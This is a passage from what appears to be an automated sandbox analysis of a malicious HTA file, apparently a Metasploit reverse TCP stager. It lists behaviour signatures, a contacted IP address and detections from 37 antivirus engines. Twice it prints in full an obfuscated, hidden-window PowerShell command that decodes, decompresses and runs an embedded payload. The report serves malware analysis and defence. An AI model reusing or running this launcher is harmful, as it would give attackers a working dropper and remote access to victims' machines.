zyflp/d7WdMUBenojC3qPwbz'+'925bR6nIslc'+'iC1gcOWsiEsxk5BUlS71iLFxaFCcX34RkDZmDPIHLN1DQGBFAuEIyZgEXM3ZUak5RPSiFSMRyOSFw2I4gDKxy5Kc{1}jggXvk1T4ts2FJf{1}lOAsucnBNxhXFSVCU0E1CGJc06y/+XHzyVo61A7IbsQqUWmz{1}2NkMlQehyZA8nVHU45KokARKyERwZOyWFrW2/UD9oltRGMWS9mfe9sSeu9Nfz68BvTZo/3/SNb6Dzqu+3U7lhHiK6DtXs0QK535pFjZ9ISzmlPtG3UHVLdaIWuoV'+'/JeT0IkHd54RjhM'+'HSZbptdzZmlOl13p9LW1obbanWvddRsti6b+hIQn'+'IHeEnmDiK4fLmDuShtGLzX0Hjs9'+'a49upw3rZsq6WssK/SlPncOZqWnas{1}fN/g{1}hg3vN/ua6PuJXXTcyWjHXj'+'tutJTpFqB2fTiyDn8+MBNnaBAcrjoafmjwK2ujswaDkZji2jOHQMtC48/XOPN{1}C7Xh6jUNjOmnQm9X1KIRva90dnmt6q+eRR04lcB2OcGjyUzm3PM984JZ5a66ENa1PBp2P6cPZ'+'Ne5fJJeWptWnIBuMwF7QbrihD/bMj8j4OOBpAy8Njgxp4+{1}OdcLZyrIZ7F+NGxxN2OAao4ubjbQxs1uoq/NpJ0BD'+'EMeBMcQovTcfTa0+8bg3/WMw87XJNfukme2hH{1}41OVbkHv6uu+a5e1Nfu5efji6mdBJxB'+'NuTD0Cg+ZjGotl{'+'1}lB58WW3fvyt5kz0KvdZH+jhJQ8yAWtAgikS3eGLtir7NqdRQVXg4LEkSEwbNFtpxkRuIMe7KhgPNAVrdtgHJfjju5e68NKsoT'+'4KV5zZULJ2c3ICHMtUgCWoXJA5EWNUfmroOLUR/0Ft5Tr39Xm2+2qi5sapsQgBL{1}ZvltsEc9RVV/d1IwStDQLF7DavX{1}INzl1C{1}oFRuS4UEz+Cc7UOX3+mJAPu4AWB1uPRcvi6AGaB9QO6UkpDNd7+Zl0T4O8myq3Uh/PN+TZbntV/svolAelXC8tPijwt7feK3XX6KqQA5B8o1I9uHxEs{1}7HJjL6o57/3dkI/ry0wcDOCxlreLfwAg25Q40wsAAA{0}{0}')-f'=','Y')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd())) filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x00000460	1	1	0

Changes read-write memory protection to read-execute (probably to avoid detection when setting all RWX flags at the same time) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory May 31, 2024, 10:03 a.m.	process_identifier: 2220 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 16 (PAGE_EXECUTE) base_address: 0x054c0000 process_handle: 0xffffffff	1	0	0

Checks for the Locally Unique Identifier on the system for a suspicious privilege (2 events)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW May 31, 2024, 10:03 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0
LookupPrivilegeValueW May 31, 2024, 10:03 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Communicates with host for which no DNS query was performed (1 event)

host

1.14.247.162

One or more non-whitelisted processes were created (1 event)

parent_process

powershell.exe

martian_process

"powershell.exe" -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String((('H4sIAEgH62UCA7VWbW/iOBD+vtL+h2iFRNBSEl6u21Za6RzSAG2hgRQoZdHJTZzEixPTxCmle/vfbxxIy9'+'62q95Ja4nWsWfG42eembGfxa6gPFbilvLt/TtlN2yc4EhRSzw1xlWllDUrz3ulNDs'+'8Uj4r6hytViaPMI0XJyftLElILLbftQ4RKE1JdMsoSdWK8rcyDUlCDi5vvxJXKN+U0l+1DuO3mO3ENm3shkQ5QLEn9y64i6VbNWfFqFDLX76UK/OD+qJ2epdhlqplZ5MKEtU8xsoV5XtFHni1WRG13KduwlPui9qUxs1GbRyn2CcDsHZP+kSE3EvLcJnn6yREZEm8vZU0sxVSyzC1E+4iz0tImparylweMF8s/lTnu9NHWSxoRGq9WJCErxyS3FOXpLUujj1GRsRfgJ{1}jE'+'hoHi0oFxO75kqilOGOsqvwXM+qArAvs3qqk7iuBlC2SShVC+sI9+9zLGNlqll9wNKdBBcaWCgDfd4mg/8Sdwxe487xQjHm+Q8Bf1e{1}pzVU'+'/K3pV6cPJWPBkA5+lqyQjlcUT2krp0R4l1bdaqxeqoEgm68{1}5rM0nnHqLZws/hL+0nPm9rpR6nc0m8WlMzE2MI+oWhFVfCgrxGckxqRVi'+'A/BRLe82iGcSRgIsJMySGz+pnUZUPOkaGWUeSZALgU3BK4h55UdntpFTy724TyIAcPsNZC35kCakkN6lxq{1}4XX6DULnNcJpWFTuDPHWr'+'ikM'+'wI15VQXFKd1s'+'oEzyflp/d7WdMUBenojC3qPwbz'+'925bR6nIslc'+'iC1gcOWsiEsxk5BUlS71iLFxaFCcX34RkDZmDPIHLN1DQGBFAuEIyZgEXM3ZUak5RPSiFSMRyOSFw2I4gDKxy5Kc{1}jggXvk1T4ts2FJf{1}lOAsucnBNxhXFSVCU0E1CGJc06y/+XHzyVo61A7IbsQqUWmz{1}2NkMlQehyZA8nVHU45KokARKyERwZOyWFrW2/UD9oltRGMWS9mfe9sSeu9Nfz68BvTZo/3/SNb6Dzqu+3U7lhHiK6DtXs0QK535pFjZ9ISzmlPtG3UHVLdaIWuoV'+'/JeT0IkHd54RjhM'+'HSZbptdzZmlOl13p9LW1obbanWvddRsti6b+hIQn'+'IHeEnmDiK4fLmDuShtGLzX0Hjs9'+'a49upw3rZsq6WssK/SlPncOZqWnas{1}fN/g{1}hg3vN/ua6PuJXXTcyWjHXj'+'tutJTpFqB2fTiyDn8+MBNnaBAcrjoafmjwK2ujswaDkZji2jOHQMtC48/XOPN{1}C7Xh6jUNjOmnQm9X1KIRva90dnmt6q+eRR04lcB2OcGjyUzm3PM984JZ5a66ENa1PBp2P6cPZ'+'Ne5fJJeWptWnIBuMwF7QbrihD/bMj8j4OOBpAy8Njgxp4+{1}OdcLZyrIZ7F+NGxxN2OAao4ubjbQxs1uoq/NpJ0BD'+'EMeBMcQovTcfTa0+8bg3/WMw87XJNfukme2hH{1}41OVbkHv6uu+a5e1Nfu5efji6mdBJxB'+'NuTD0Cg+ZjGotl{'+'1}lB58WW3fvyt5kz0KvdZH+jhJQ8yAWtAgikS3eGLtir7NqdRQVXg4LEkSEwbNFtpxkRuIMe7KhgPNAVrdtgHJfjju5e68NKsoT'+'4KV5zZULJ2c3ICHMtUgCWoXJA5EWNUfmroOLUR/0Ft5Tr39Xm2+2qi5sapsQgBL{1}ZvltsEc9RVV/d1IwStDQLF7DavX{1}INzl1C{1}oFRuS4UEz+Cc7UOX3+mJAPu4AWB1uPRcvi6AGaB9QO6UkpDNd7+Zl0T4O8myq3Uh/PN+TZbntV/svolAelXC8tPijwt7feK3XX6KqQA5B8o1I9uHxEs{1}7HJjL6o57/3dkI/ry0wcDOCxlreLfwAg25Q40wsAAA{0}{0}')-f'=','Y')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))

Creates a suspicious Powershell process (6 events)

option	-nop	value	Does not load current user profile
option	-w hidden	value	Attempts to execute command with a hidden window
option	-nop	value	Does not load current user profile
option	-w hidden	value	Attempts to execute command with a hidden window
option	-nop	value	Does not load current user profile
option	-w hidden	value	Attempts to execute command with a hidden window

File has been identified by 37 AntiVirus engines on VirusTotal as malicious (37 events)

Lionic	Trojan.Script.Agent.4!c
Cynet	Malicious (score: 99)
CAT-QuickHeal	Script.Trojan.42447
Skyhigh	BehavesLike.HTML.Dropper.zr
ALYac	Trojan.Script.905440
VIPRE	Trojan.Script.905440
Sangfor	Malware.Generic-VBS.Save.facd9283
Arcabit	Trojan.Script.DDD0E0
Baidu	VBS.Trojan-Downloader.Agent.va
Symantec	VBS.Heur.SNIC
ESET-NOD32	VBS/Agent.NUI
McAfee	PS/Injector.d
Avast	VBS:Obfuscated-GQ [Cryp]
ClamAV	Vbs.Backdoor.Msfvenom_Payload-9951533-0
Kaspersky	HEUR:Trojan.VBS.Agent.gen
BitDefender	Trojan.Script.905440
NANO-Antivirus	Trojan.Html.Downloader.fqlyhy
MicroWorld-eScan	Trojan.Script.905440
Rising	Dropper.Ploty!8.EEC8 (TOPIS:E0:Q0eCX8vJheP)
Emsisoft	Trojan.Script.905440 (B)
F-Secure	Backdoor:HTML/PowerShellStager.A
FireEye	Trojan.Script.905440
Sophos	Mal/PSDL-B
Ikarus	Trojan.PowerShell.Agent
Google	Detected
Avira	VBS/PSRunner.VPA
Kingsoft	Win32.Infected.AutoInfector.a
Gridinsoft	Trojan.U.Gen.tr
Xcitium	TrojWare.VBS.Agent.NUI@8a4oj4
Microsoft	TrojanDropper:VBS/PSRunner.G!MSR
ZoneAlarm	HEUR:Trojan.VBS.Agent.gen
GData	Trojan.Script.905440
Varist	VBS/Agent.AXB!Eldorado
Tencent	Heur:Trojan.Powershell.Generic.d
MAX	malware (ai score=86)
Fortinet	VBS/Inject.B!tr
AVG	VBS:Obfuscated-GQ [Cryp]

Connects to IP addresses that are no longer responding to requests (legitimate services will remain up-and-running usually) (2 events)

dead_host	1.14.247.162:40001
dead_host	192.168.56.103:49166

reverse_tcp_uuid.hta

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All